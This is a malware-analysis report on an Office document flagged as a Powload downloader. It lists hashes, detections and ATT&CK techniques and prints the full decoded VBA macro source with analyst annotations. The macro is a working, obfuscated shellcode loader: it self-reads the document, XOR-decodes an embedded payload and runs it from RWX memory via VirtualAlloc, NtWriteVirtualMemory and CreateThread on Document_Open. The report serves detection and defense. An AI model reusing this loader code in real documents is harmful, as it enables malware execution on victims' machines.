Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 961e013da3bb45e8…

MALICIOUS

Office (OLE)

37.1 KB Created: 2017-08-02 20:25:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 392470db5a44834d6012d0fd4a82edce SHA-1: 1b4c333d11b693d86fa7d8b8d65628e6d4e03888 SHA-256: 961e013da3bb45e8d839104a9476f81593459617051fc56d67778202fef4e1c5
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The macros use `VirtualAlloc` and `NtWriteVirtualMemory` API calls, indicating an attempt to allocate memory and write shellcode. This is a common technique for downloading and executing a second-stage payload. The ClamAV detection name 'Doc.Downloader.Powload-6809817-0' further supports this behavior.

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        DzofKeNBGTwQlwSzN
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4851 bytes
SHA-256: e4fa6a1f02d5171c0568dd21e52fce2d0b8c2d552dee2fe250d5c003ea7d7a06
Detection
ClamAV: No threats found
Obfuscation or payload: likely
37 of 70 identifiers look randomly generated (e.g. 'lPBxbSPCMWTDNMFVphAvPAPZUUtOewsSMNHNkmMe') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

' Analyst notes (carved macros.bas, ThisDocument module).
' The three Win32/NT imports below are the whole loader primitive set:
' allocate -> write -> start thread. CreateThread and VirtualAlloc are
' imported under random Alias names so the real API names do not appear
' as identifiers; only NtWriteVirtualMemory keeps its true name (it is the
' string a static scan would still catch). The VBA7 branch adds PtrSafe and
' LongPtr so the same declarations load on 64-bit Office.
#If VBA7 Then
' kernel32!CreateThread: runs a new thread whose start address is the third
' argument. Called with the VirtualAlloc buffer in DzofKeNBGTwQlwSzN.
Private Declare PtrSafe Function zKpeJtqFSIEYYSyAhYznLEj Lib "kernel32" Alias "CreateThread" (ByVal MgzLhhSfzNFkiZjGUzwDBDj As Long, ByVal cIyZXr As Long, ByVal mWSpDbsmPgSFZsTUgmyDYz As LongPtr, liWwIyISihcsopKGE As Long, ByVal mHwIXkKjOsNzOMNwHg As Long, FJOgoKyXZEEvGUaLSdClL As Long) As LongPtr
' kernel32!VirtualAlloc(address, size, allocationType, protect).
Private Declare PtrSafe Function hENaVteUVUkdRjbfGuMWRHVinrVE Lib "kernel32" Alias "VirtualAlloc" (ByVal UEfNRUbWsnCzbrxeIzNK As Long, ByVal bweMsqe As LongPtr, ByVal cPjeiVOPwcqJJBYRYL As Long, ByVal xriJgoCThabyEXvqxsuTwJpmwx As Long) As LongPtr
' ntdll!NtWriteVirtualMemory(process, baseAddress, buffer, size, bytesWritten).
' The buffer parameter is declared "ByVal ... As String", so VBA passes a
' pointer to the (ANSI-converted) string data; this is why the decoded
' payload is carried around as a String rather than a Byte array.
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal vzxnN As LongPtr, ByVal xHjUgcPGbGOuDLMnlByD As LongPtr, ByVal wNcVmJngtJNnRgqlwrpFmudART As String, ByVal ohoWOjObThYTtCAIWbgLEwb As LongPtr, ByRef jjYFbKBdtXZYfMYedfwexyWc As LongPtr) As LongPtr
#Else
' 32-bit (pre-VBA7) equivalents of the same three imports; pointers are Long.
Private Declare Function zKpeJtqFSIEYYSyAhYznLEj Lib "kernel32" Alias "CreateThread"  (ByVal MgzLhhSfzNFkiZjGUzwDBDj As Long, ByVal cIyZXr As Long, ByVal mWSpDbsmPgSFZsTUgmyDYz As Long, liWwIyISihcsopKGE As Long, ByVal mHwIXkKjOsNzOMNwHg As Long, FJOgoKyXZEEvGUaLSdClL As Long) As Long
Private Declare Function hENaVteUVUkdRjbfGuMWRHVinrVE Lib "kernel32" Alias "VirtualAlloc" (ByVal UEfNRUbWsnCzbrxeIzNK As Long, ByVal bweMsqe As Long, ByVal cPjeiVOPwcqJJBYRYL As Long, ByVal xriJgoCThabyEXvqxsuTwJpmwx As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal vzxnN As Long, ByVal xHjUgcPGbGOuDLMnlByD As Long, ByVal wNcVmJngtJNnRgqlwrpFmudART As String, ByVal ohoWOjObThYTtCAIWbgLEwb As Long, ByRef jjYFbKBdtXZYfMYedfwexyWc As Long) As Long
#End If

' VirtualAlloc arguments used by the loader:
'   &H1000 = MEM_COMMIT
'   &H40   = PAGE_EXECUTE_READWRITE
' An RWX commit from an Office host process is itself a high-value detection
' signal (memory-scanning / EDR telemetry), independent of the payload bytes.
Const zWwgEGyhRGMzfxZZEr = &H1000
Const vJBStrOnEXYwaUllGBRhQZ = &H40

' Main loader routine, reached from Document_Open.
' Flow, as visible below:
'   1. read the open document's own bytes from disk (ActiveDocument.FullName);
'   2. locate the payload by splitting on a long fixed marker string and
'      keeping the last segment;
'   3. drop two leading characters, XOR-decode with a fixed key (hFSZyZfz);
'   4. VirtualAlloc an RWX buffer, NtWriteVirtualMemory the decoded bytes
'      into it, and CreateThread at the buffer start.
' No return value and no error checking on any of the API calls. The
' second-stage payload is therefore embedded in the .doc itself, not fetched
' by this macro; the marker string, the XOR key and the self-read of
' ActiveDocument.FullName are all static/behavioral indicators for this sample.
Public Sub DzofKeNBGTwQlwSzN()
    Dim ZlXeEuXowdfWxbOnOmiIyZOl() As Byte

    ' Whole file contents of the document currently open in Word.
    ZlXeEuXowdfWxbOnOmiIyZOl = PvQHHMJyiFk(ActiveDocument.FullName)
    Dim WpkKxavVzPrByVUiv As String
    ' StrConv(..., 64): 64 = vbUnicode, byte array -> String.
    WpkKxavVzPrByVUiv = StrConv(ZlXeEuXowdfWxbOnOmiIyZOl, 64)
    
    ' Untyped Dim -> Variant; Split returns a Variant array.
    Dim KwKwvbXIFqeqawMDHeME
    ' The long literal is a separator marker placed in the document body; the
    ' encoded payload is whatever follows its last occurrence.
    KwKwvbXIFqeqawMDHeME = Split(WpkKxavVzPrByVUiv, "lPBxbSPCMWTDNMFVphAvPAPZUUtOewsSMNHNkmMemPELvCBpOigNxMTKZCDhyaxpDaQaeRKdvwjZWeDsteZWpFuZTXOIJEFmsphvLBlXxdrbDUOUYlOuaBZYFRghdbtQQXHHWiGRScymntwZiTKxQllQpjPUveUv")

    Dim cKaYmwMqroAcsdOQAUjMPueQiPUOU As String
    Dim GkPxBXvdyemKvchcMECxg As String
    Dim mVhBR As String
    ' Last segment after the marker; 64 = vbUnicode, 128 = vbFromUnicode
    ' (round-trips the text through the ANSI code page).
    GkPxBXvdyemKvchcMECxg = StrConv(StrConv(KwKwvbXIFqeqawMDHeME(UBound(KwKwvbXIFqeqawMDHeME)), 64), 128)
    ' Mid$ from position 3: skips the first two characters of the segment
    ' (presumably a delimiter/padding after the marker — not verifiable here).
    mVhBR = Mid$(GkPxBXvdyemKvchcMECxg, 3, Len(GkPxBXvdyemKvchcMECxg))

    ' Repeating-key XOR decode with the hard-coded key; result is the raw
    ' payload carried as a String.
    cKaYmwMqroAcsdOQAUjMPueQiPUOU = hFSZyZfz("BlFnhYPEWBXcNKmugYjrWZF", mVhBR)
    
    ' Pointer-sized locals: LongPtr on VBA7, Long on older hosts.
    #If VBA7 Then
        Dim sYvKUJykgBZXTYdcPPsUjTkLFT As LongPtr
        Dim txNkUwQiUY As LongPtr
    #Else
        Dim sYvKUJykgBZXTYdcPPsUjTkLFT As Long
        Dim txNkUwQiUY As Long
    #End If

    ' VirtualAlloc(NULL, payloadLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE):
    ' return value (buffer address) is not checked for 0.
    sYvKUJykgBZXTYdcPPsUjTkLFT = hENaVteUVUkdRjbfGuMWRHVinrVE(0, Len(cKaYmwMqroAcsdOQAUjMPueQiPUOU), zWwgEGyhRGMzfxZZEr, vJBStrOnEXYwaUllGBRhQZ)
    ' Process handle -1 is the current-process pseudo-handle, so this is a
    ' self-write into the buffer just allocated; NTSTATUS is ignored.
    txNkUwQiUY = NtWriteVirtualMemory(-1, sYvKUJykgBZXTYdcPPsUjTkLFT, cKaYmwMqroAcsdOQAUjMPueQiPUOU, Len(cKaYmwMqroAcsdOQAUjMPueQiPUOU), 0)
    ' CreateThread(NULL, 0, bufferAddress, NULL, 0, NULL): the buffer is run
    ' as a thread start routine inside the Office process. The returned thread
    ' handle overwrites the previous status and is never closed or waited on.
    txNkUwQiUY = zKpeJtqFSIEYYSyAhYznLEj(0, 0, sYvKUJykgBZXTYdcPPsUjTkLFT, 0, 0, 0)
End Sub

' Reads an entire file into a Byte array.
'   ocEnHtXNgjDRj: full path of the file to read (the loader passes the
'                  open document's own path).
'   Returns:       0-based Byte array holding every byte of the file.
'   Raises:        run-time error 53 ("File not found") when Dir() finds
'                  nothing at the path.
' Note: the array is sized LOF - 1, so an empty file (LOF = 0) would make the
' ReDim fail with a different run-time error rather than returning an empty
' array; not a concern for the self-read use here.
Public Function PvQHHMJyiFk(ByVal ocEnHtXNgjDRj As String) As Byte()
    Dim GkPxBXvdyemKvchcMECxg As Long
    Dim mVhBR() As Byte
    ' Next free VBA file number.
    GkPxBXvdyemKvchcMECxg = FreeFile
    ' LenB(Dir(path)) is non-zero only when the path exists.
    If LenB(Dir(ocEnHtXNgjDRj)) Then
        Open ocEnHtXNgjDRj For Binary Access Read As GkPxBXvdyemKvchcMECxg
        ' Size the buffer to the file length (indices 0 .. LOF-1).
        ReDim mVhBR(LOF(GkPxBXvdyemKvchcMECxg) - 1&) As Byte
        ' Single Get with no position argument reads from the current
        ' (start) position and fills the whole array.
        Get GkPxBXvdyemKvchcMECxg, , mVhBR
        Close GkPxBXvdyemKvchcMECxg
    Else
        Err.Raise 53
    End If
    PvQHHMJyiFk = mVhBR
    ' Release the local copy; the return value already holds the data.
    Erase mVhBR
End Function

' Word auto-execute entry point: runs when the document is opened (after the
' user enables macros). This is the only path that invokes the loader, so
' blocking macro execution from the internet zone / disabling auto-exec
' handlers neutralises the sample.
Public Sub Document_Open()
    DzofKeNBGTwQlwSzN
End Sub

' Excel auto-execute handler that simply chains to Document_Open.
' NOTE(review): the loader reads ActiveDocument, a Word object, so under
' Excel this path would presumably fail at run time; the handler looks like a
' leftover from a generic Word/Excel template rather than a working
' Excel vector — verify in a sandbox before relying on it as an indicator.
Sub Workbook_Open()
    Document_Open
End Sub

' Repeating-key XOR decoder (the sample's only "crypto").
'   LdnWkEzbXYUFexZpLBEXT: key string, cycled over the input.
'   agnVSmmmvXIt:          encoded input string.
'   Returns:               string of the same length where each character is
'                          Chr(Asc(input(i)) Xor Asc(key(i mod keyLen))).
' The operation is its own inverse, so the same routine encodes and decodes.
' Characters are compared via Asc/Chr, i.e. as single-byte codes.
Public Function hFSZyZfz(LdnWkEzbXYUFexZpLBEXT As String, agnVSmmmvXIt As String) As String
    Dim BoBVx As Long
    Dim TjCWCdiTJMyBBOuchJoLnOL As String
    Dim XXLwxakFhkahyjLSKs As Integer, yaVBsXeFqJyDJdeIvJYXuGq As Integer, a As Long

    For BoBVx = 1 To Len(agnVSmmmvXIt)
        ' 1-based key index: Mod gives 0 at every multiple of the key length,
        ' which is remapped to the last key character.
        a = BoBVx Mod Len(LdnWkEzbXYUFexZpLBEXT)
        If a = 0 Then a = Len(LdnWkEzbXYUFexZpLBEXT)
        
        XXLwxakFhkahyjLSKs = Asc(Mid$(agnVSmmmvXIt, BoBVx, 1))
        yaVBsXeFqJyDJdeIvJYXuGq = Asc(Mid$(LdnWkEzbXYUFexZpLBEXT, a, 1))
        ' String concatenation in a loop: quadratic, but inputs are small.
        TjCWCdiTJMyBBOuchJoLnOL = TjCWCdiTJMyBBOuchJoLnOL + Chr(XXLwxakFhkahyjLSKs Xor yaVBsXeFqJyDJdeIvJYXuGq)
    Next BoBVx
    
   hFSZyZfz = TjCWCdiTJMyBBOuchJoLnOL
End Function